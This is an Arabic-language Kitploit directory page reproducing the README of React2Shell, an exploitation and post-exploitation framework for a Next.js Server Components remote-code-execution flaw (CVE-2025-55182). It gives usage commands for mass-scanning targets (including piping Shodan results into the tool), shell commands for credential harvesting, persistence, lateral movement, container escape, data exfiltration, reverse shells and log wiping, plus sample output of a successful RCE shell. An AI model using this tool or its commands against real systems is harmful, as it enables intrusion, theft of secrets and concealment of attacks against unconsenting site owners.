Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
React2Shell — R2S هو إطار عمل شامل للاستغلال وما بعد الاستغلال يستهدف ثغرة Next.js React Server Components (CVE-2025-55182). يوفر واجهة أوامر تفاعلية بميزات متقدمة لاختبار الاختراق، بما في ذلك نقل الملفات، والثبات، وجمع المعلومات، وفحوصات تصعيد الامتيازات، والمزيد. | Kitploit
أدوات/GitHubGitHub/4nuxd/react2shell
أطر اختبار الاختراقتصعيد الامتيازاتأطر الاستغلالآليات الاستمراريةالحركة الجانبيةاستغلال تطبيقات الويبتسريب البياناتما بعد الاستغلالالقيادة والسيطرةالهروب من الحاوية
GitHub
57منذ 9 أشهرلم تتم المراجعة بعد
4nuxd/react2shell

React2Shell

R2S هو إطار عمل شامل للاستغلال وما بعد الاستغلال يستهدف ثغرة Next.js React Server Components (CVE-2025-55182). يوفر واجهة أوامر تفاعلية بميزات متقدمة لاختبار الاختراق، بما في ذلك نقل الملفات، والثبات، وجمع المعلومات، وفحوصات تصعيد الامتيازات، والمزيد.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚀 R2S - إطار استغلال مكونات Next.js RSC

Version Python License CVE

إطار متقدم لاستغلال ما بعد الاختراق لمكونات React Server Components الخاصة بـ Next.js (RCE)

الميزات • التثبيت • الاستخدام • الأوامر • أمثلة


📋 نظرة عامة

R2S هو إطار استغلال واستغلال ما بعد الاختراق شامل يستهدف ثغرة مكونات React Server Components في Next.js (CVE-2025-55182). يوفر شفرة تفاعلية بميزات متقدمة لاختبار الاختراق، بما في ذلك نقل الملفات، التثبيت، التعداد، فحوصات رفع الامتيازات، والمزيد.

🎯 القدرات الرئيسية

  • ✅ فحص الثغرات آليًا - فحص جماعي لعدة أهداف
  • ✅ شفرة تفاعلية لـ RCE - تنفيذ أوامر مع الحفاظ على حالة الدليل
  • ✅ نقل ملفات عبر HTTP - رفع/تنزيل ملفات دون قيود base64
  • ✅ أتمتة الشل العكسي - تجربة أكثر من 25 حمولة شل عكسي
  • ✅ تعداد متقدم - النظام، الشبكة، الحاويات، والبيانات الوصفية السحابية
  • ✅ رفع الامتيازات - كشف تلقائي لنواقل رفع الامتيازات
  • ✅ جمع بيانات الاعتماد - استخراج كلمات المرور والمفاتيح والرموز والأسرار
  • ✅ آليات التثبيت - الحفاظ على الوصول عبر عمليات إعادة التشغيل
  • ✅ الحركة الجانبية - اكتشاف والتنقل إلى مضيفين آخرين
  • ✅ الهروب من الحاويات - فحص نواقل الهروب من Docker/Kubernetes
  • ✅ استخراج البيانات - استخراج الملفات الحساسة والإعدادات
  • ✅ عمليات التخفي - مسح السجلات وإخفاء الآثار

🔥 الميزات

🌐 الاستغلال الأساسي

  • فحص جماعي مع دعم تعدد الخيوط
  • وضع الأنابيب للتكامل مع الأدوات الأخرى
  • كشف آلي للثغرات في Next.js RSC
  • شفرة تفاعلية مع الحفاظ على الحالة مع دليل عمل دائم

📁 عمليات الملفات

  • رفع عبر HTTP - نقل الملفات إلى الهدف عبر wget/curl
  • تنزيل عبر HTTP - استخراج الملفات عبر طلبات POST
  • بدون قيود حجم - يعمل مع الملفات الكبيرة (على عكس طرق base64)
  • خادم HTTP تلقائي - بدء/إيقاف حسب الحاجة

🔍 الاستطلاع والتعداد

  • تعداد النظام - نظام التشغيل، النواة، المستخدمين، العمليات
  • اكتشاف الشبكة - الواجهات، المسارات، ARP، DNS، المنافذ المستمعة
  • كشف الحاويات - التعرف على Docker وKubernetes وLXC
  • البيانات الوصفية السحابية - استخراج بيانات الاعتماد من AWS وGCP وAzure
  • تفريغ ذاكرة العمليات - استخراج الأسرار من العمليات الجارية
  • اكتشاف الملفات المهمة - SUID، الدلائل القابلة للكتابة، النسخ الاحتياطية، الإعدادات

🔐 جمع بيانات الاعتماد

  • متغيرات البيئة (كلمات المرور، مفاتيح API، الرموز)
  • ملفات .env وملفات الإعدادات
  • مفاتيح SSH الخاصة وملفات authorized_keys
  • سجل bash مع الأوامر الحساسة
  • ملفات قواعد البيانات (SQLite، تفريغ MySQL)
  • بيانات الاعتماد السحابية (AWS، Azure، GCP)
  • بيانات اعتماد Git ورموز NPM
  • بيانات المتصفح (الكوكيز، بيانات تسجيل الدخول)
  • أسرار Docker وKubernetes

⬆️ رفع الامتيازات

  • كشف SUID/SGID للثنائيات
  • تعداد أذونات sudo
  • ملفات النظام القابلة للكتابة (/etc/passwd، /etc/shadow)
  • فحوصات الوصول لمقبس Docker
  • تحليل قدرات Linux
  • اقتراحات استغلال النواة
  • تعداد مهام cron
  • فرص اختطاف PATH

🔄 استغلال ما بعد الاختراق

  • آليات التثبيت - مهام cron، .bashrc، خدمات systemd
  • تثبيت متقدم - LD_PRELOAD، مؤقتات systemd
  • فحص المنافذ - استكشاف الشبكة الداخلية
  • الحركة الجانبية - اكتشاف مفاتيح SSH، تحليل known_hosts
  • الهروب من الحاويات - فحص الحاويات المميزة، تحليل القدرات
  • استخراج البيانات - جمع تلقائي للبيانات الحساسة
  • أتمتة الشل العكسي - أكثر من 25 نوع حمولة مع إعادة المحاولة التلقائية

🥷 التخفي والتهرب

  • مسح السجلات - سجل bash، سجلات التوثيق، syslog
  • إخفاء الآثار - تنظيف wtmp وlastlog
  • إدارة الجلسات - حفظ واستئناف الجلسات

🛠️ التثبيت

المتطلبات الأساسية

# Python 3.6 أو أعلى
python3 --version

# تثبيت التبعيات
pip3 install requests urllib3

البداية السريعة

# استنساخ أو تنزيل الأداة
cd r2s-main

# جعله قابلًا للتنفيذ (اختياري)
chmod +x r2s_enhanced.py

# تشغيل الأداة
python3 r2s_enhanced.py -h

🚀 الاستخدام

الصيغة الأساسية

python3 r2s_enhanced.py [OPTIONS]

خيارات سطر الأوامر

الخيارالوصفالافتراضي
-u, --urlرابط الهدف الفردي-
-l, --listملف يحتوي على قائمة الروابط-
-c, --cmdالأمر الأولي للتنفيذid
-t, --threadsعدد خيوط الفحص30
-p, --proxyوكيل HTTP (مثال: http://127.0.0.1:8080)-
-v, --verboseتفعيل الإخراج التفصيليFalse
--http-portمنفذ خادم HTTP لنقل الملفات8000

طرق الإدخال

1. هدف واحد

python3 r2s_enhanced.py -u http://target.com

2. أهداف متعددة (ملف)

python3 r2s_enhanced.py -l targets.txt -t 50

3. وضع الأنابيب (stdin)

cat targets.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d example.com | httpx | python3 r2s_enhanced.py

💻 أوامر الشفرة التفاعلية

بمجرد الوصول إلى RCE، ستدخل شفرة تفاعلية بهذه الأوامر:

📂 نقل الملفات

upload <local_file> <remote_path>    # رفع ملف إلى الهدف
download <remote_file> <local_path>  # تنزيل ملف من الهدف

🧭 التنقل

cd <directory>                       # تغيير دليل العمل
pwd                                  # طباعة دليل العمل

🔍 التعداد

enum                                 # تعداد النظام الكامل
privesc                              # فحوصات رفع الامتيازات
harvest                              # جمع بيانات الاعتماد
portscan <ip>                        # فحص منافذ الشبكة الداخلية
memdump [pid]                        # تفريغ ذاكرة العملية للأسرار

🎯 استغلال ما بعد الاختراق

lateral                              # فرص الحركة الجانبية
escape                               # نواقل الهروب من الحاويات
exfil [type]                         # استخراج البيانات (env/config/keys/db/logs/all)
reverse <lhost> <lport>              # تجربة حمولات شل عكسي متعددة

🔒 التثبيت

persist                              # إضافة تثبيت أساسي
advpersist                           # إضافة تثبيت متقدم

🥷 التخفي

stealth                              # مسح السجلات وإخفاء الآثار

💾 إدارة الجلسات

save                                 # حفظ الجلسة الحالية
help, ?                              # إظهار رسالة المساعدة
exit, quit                           # الخروج من الشفرة التفاعلية

🖥️ أوامر النظام

تنفيذ أي أمر شل مباشرة:

whoami
id
uname -a
ps aux
netstat -tulpn
cat /etc/passwd

📚 أمثلة

مثال 1: استغلال أساسي

$ python3 r2s_enhanced.py -u http://vulnerable-app.com

    _   __          __  ____            
   / | / /__  _  __/ /_/ __ \________   
  /  |/ / _ \| |/_/ __/ /_/ / ___/ _ \  
 / /|  /  __/>  </_ _/ _, _/ /__/  __/  
/_/ |_/\___/_/|_|\__/_/ |_|\___/\___/   

   Next.js RSC Exploit Tool (CVE-2025-55182)
   Mass Scanner & Pipeline Edition (v4.1.0 - Enhanced)

   >> CREDIT( G4rxd )

[*] Loaded 1 targets. Starting scan with 30 threads...
[*] Payload Command: id

[VULN] http://vulnerable-app.com >>> RCE SUCCESS
       Output: uid=1000(node) gid=1000(node) groups=1000(node)

[+] Stateful Interactive RCE shell started. Type 'help' for commands.
[*] Advanced features: enum, privesc, persist, portscan, harvest, stealth
[*] New features: memdump, lateral, escape, exfil, advpersist, reverse

[+] HTTP server started on 192.168.1.100:8000

next-rce:/app$

مثال 2: تعداد النظام

next-rce:/app$ enum

[*] Starting automated enumeration...

============================================================
[*] System Info
============================================================
Linux 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="22.04.3 LTS (Jammy Jellyfish)"
تنزيل الأداة